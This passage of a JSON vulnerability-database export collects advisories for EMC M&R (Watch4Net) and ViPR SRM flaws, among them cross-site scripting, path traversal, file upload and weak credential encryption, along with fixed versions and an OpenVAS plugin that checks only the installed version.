Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html\r\n", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:DOC:31823", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31823", "title": "Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting Frontend", "type": "securityvulns", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-0513", "CVE-2015-0516", "CVE-2015-0515", "CVE-2015-0514"], "description": "Crossite scripting, insecure data storage, directory traversal, unrestricted files upload.", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:VULN:14236", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14236", "title": "EMC M&R multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-6506", "CVE-2014-6558", "CVE-2014-9296", "CVE-2014-6515", "CVE-2014-6493", "CVE-2015-0513", "CVE-2014-6519", "CVE-2014-3618", "CVE-2014-6466", "CVE-2014-6517", "CVE-2015-0516", "CVE-2014-6504", "CVE-2014-6502", "CVE-2014-9294", "CVE-2014-6492", "CVE-2014-6457", "CVE-2014-6476", "CVE-2014-6503", "CVE-2014-9295", "CVE-2014-6562", "CVE-2014-6511", "CVE-2014-6485", "CVE-2014-6531", "CVE-2014-6456", "CVE-2014-6468", "CVE-2014-6458", "CVE-2014-6532", "CVE-2014-4288", "CVE-2015-0515", "CVE-2014-6513", "CVE-2015-0514", "CVE-2014-9293", "CVE-2014-6527", "CVE-2014-6512"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities \r\n\r\nEMC Identifier: ESA-2015-004\r\n\r\nCVE Identifier: CVE-2015-0513, CVE-2015-0514, CVE-2015-0515, CVE-2015-0516, CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562, CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296, CVE-2014-3618\r\n\r\nSeverity Rating: CVSS v2 Base Score: View details below for individual CVSS score for each CVE\r\n\r\nAffected products: \r\n\u2022\tEMC M&R (Watch4Net) versions prior 6.5u1\r\n\u2022\tEMC ViPR SRM versions prior to 3.6.1\r\n\r\nSummary:\r\nEMC M&R (Watch4Net) is vulnerable to multiple security vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. EMC ViPR SRM is built on EMC M&R platform and is also affected by these vulnerabilities. \r\n\r\nDetails:\r\nThe vulnerabilities include:\r\n\u2022\tMultiple Oracle Java Runtime Environment (JRE) Vulnerabilities\r\nCVE Identifiers: CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562. \r\n\r\nOracle JRE contains multiple security vulnerabilities. Oracle JRE has been upgraded to 8.0u25 to address these vulnerabilities. See vendor advisory (http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#AppendixJAVA) for more details. \r\nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the individual CVSS scores for each CVE listed above.\r\n\r\n\u2022\tMultiple Cross-Site Scripting Vulnerabilities\r\nCVE Identifier: CVE-2015-0513\r\nSeveral user-supplied fields in the administrative user interface may be potentially exploited by an authenticated privileged malicious user to conduct cross-site-scripting attacks on other authenticated users of the system. \r\nCVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\n\r\n\u2022\tInsecure Cryptographic Storage Vulnerability \r\nCVE Identifier: CVE-2015-0514\r\nA malicious non-ViPR SRM user with access to an installation of ViPR SRM and knowledge of internal encryption methods could potentially decrypt credentials used for data center discovery.\r\nCVSS v2 Base Score: 5.7 (AV:A/AC:M/Au:N/C:C/I:N/A:N)\r\n\r\n\u2022\tUnrestricted File Upload Vulnerability \r\nCVE Identifier: CVE-2015-0515\r\nThis vulnerability may potentially be exploited by an authenticated, privileged malicious user to upload arbitrary files into the file system via the web interface.\r\nCVSS v2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)\r\n\r\n\u2022\tPath Traversal Vulnerability\r\nCVE Identifier: CVE-2015-0516\r\nThis vulnerability may potentially be exploited by an authenticated, privileged malicious user to download arbitrary files from the file system via the web interface by manipulating the directory structure in the URL.\r\nCVSS v2 Base Score: 6.8 (AV:N/AC:L/Au:S/C:C/I:N/A:N)\r\n\r\n\u2022\tSUSE Procmail Heap Overflow Vulnerability \r\nCVE Identifier: CVE-2014-3618\r\nProcmail was updated to fix a heap-overflow in procmail's formail utility when processing specially-crafted email headers. This issue affects only vApp deployments of the affected software. \r\nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS score.\r\n\r\n\u2022\tNTP Multiple Vulnerabilities \r\nCVE Identifier: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296\r\nNTP was updated to fix multiple vulnerabilities. See vendor advisory http://support.ntp.org/bin/view/Main/SecurityNotice for more details. These issues affect only vApp deployments of the affected software. \r\nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS scores.\r\n\r\n\r\nResolution:\r\nThe following version contains the resolution to these issues:\r\n\u2022\tEMC M&R (Watch4Net) 6.5u1 and later\r\n\u2022\tEMC ViPR SRM 3.6.1 and later\r\n\r\nEMC strongly recommends all customers upgrade at the earliest opportunity. In addition, customers are recommended to review the Security Configuration Guide distributed with the product for specific instructions on secure configurations of the system.\r\n\r\nLink to remedies:\r\nRegistered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM \r\n \r\nCredits:\r\nEMC would like to thank Han Sahin of Securify B.V. (han.sahin@securify.nl) for reporting CVE-2015-0513 and CVE-2015-0514. \r\n\r\n\r\nEMC Product Security Response Center\r\nsecurity_alert@emc.com\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlS+cwIACgkQtjd2rKp+ALwgrQCfd0XochnaIrLbek4U/Nt5xGHG\r\nPIAAn0inLvHDbgu5c5hZCsWC48CcJVN/\r\n=zSNS\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2015-01-25T00:00:00", "published": "2015-01-25T00:00:00", "id": "SECURITYVULNS:DOC:31664", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31664", "title": "ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0513", "CVE-2015-0516", "CVE-2015-0515"], "description": "EMC M&R (Watch4net) is prone to:\n1. Credential Disclosure\nIt was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using\na fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial\nto decrypt them.\n\n2. Directory Traversal\nA path traversal vulnerability was found in EMC M&R (Watch4net) Device Discovery. This vulnerability allows an attacker\nto access sensitive files containing configuration data, passwords, database records, log data, source code, and\nprogram scripts and binaries.\n\n3 Arbitrary File Upload Vulnerability\nAn attacker may leverage this issue to upload arbitrary files to the affected computer. This can result in arbitrary code\nexecution within the context of the vulnerable application.\n\n4. Multiple Cross Site Scripting Vulnerabilities\nMultiple cross site scripting vulnerabilities were found in EMC M&R (Watch4net) Centralized Management Console, Web Portal and\nAlerting Frontend.", "modified": "2018-10-26T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310105241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105241", "type": "openvas", "title": "EMC M&R (Watch4net) Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_emc_mult_vuln_72255.nasl 12131 2018-10-26 14:03:52Z mmartin $\n#\n# EMC M&R (Watch4net) Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:emc:watch4net\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105241\");\n script_bugtraq_id(72259, 72256, 72255);\n script_cve_id(\"CVE-2015-0513\", \"CVE-2015-0515\", \"CVE-2015-0516\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 12131 $\");\n\n script_name(\"EMC M&R (Watch4net) Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72255\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72256\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72259\");\n\n script_tag(name:\"impact\", value:\"A remote attacker could exploit the traversal vulnerability using directory-\ntraversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested\nmay aid in launching further attacks.\n\nAn attacker may leverage the Arbitrary File Upload Vulnerability to upload arbitrary files to the affected computer.\nThis can result in arbitrary code execution within the context of the vulnerable application.\n\nAn attacker may leverage the Cross Site Scripting Vulnerabilities to execute arbitrary script code in the browser of an\nunsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication\ncredentials and launch other attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"EMC M&R (Watch4net) is prone to:\n1. Credential Disclosure\nIt was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using\na fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial\nto decrypt them.\n\n2. Directory Traversal\nA path traversal vulnerability was found in EMC M&R (Watch4net) Device Discovery. This vulnerability allows an attacker\nto access sensitive files containing configuration data, passwords, database records, log data, source code, and\nprogram scripts and binaries.\n\n3 Arbitrary File Upload Vulnerability\nAn attacker may leverage this issue to upload arbitrary files to the affected computer. This can result in arbitrary code\nexecution within the context of the vulnerable application.\n\n4. Multiple Cross Site Scripting Vulnerabilities\nMultiple cross site scripting vulnerabilities were found in EMC M&R (Watch4net) Centralized Management Console, Web Portal and\nAlerting Frontend.\");\n\n script_tag(name:\"affected\", value:\"EMC M&R (Watch4net) before 6.5u1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 16:03:52 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-20 10:57:29 +0100 (Fri, 20 Mar 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_emc_m_and_r_detect.nasl\");\n script_require_ports(\"Services/www\", 58080);\n script_mandatory_keys(\"emc_m_r/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( vers = get_app_version( cpe:CPE, port:port ) )\n{\n if( revcomp( a:vers, b:\"6.5u1\" ) < 0 )\n {\n report = 'Installed version: ' + vers + '\\n' +\n 'Fixed version: 6.5u1\\n';\n\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}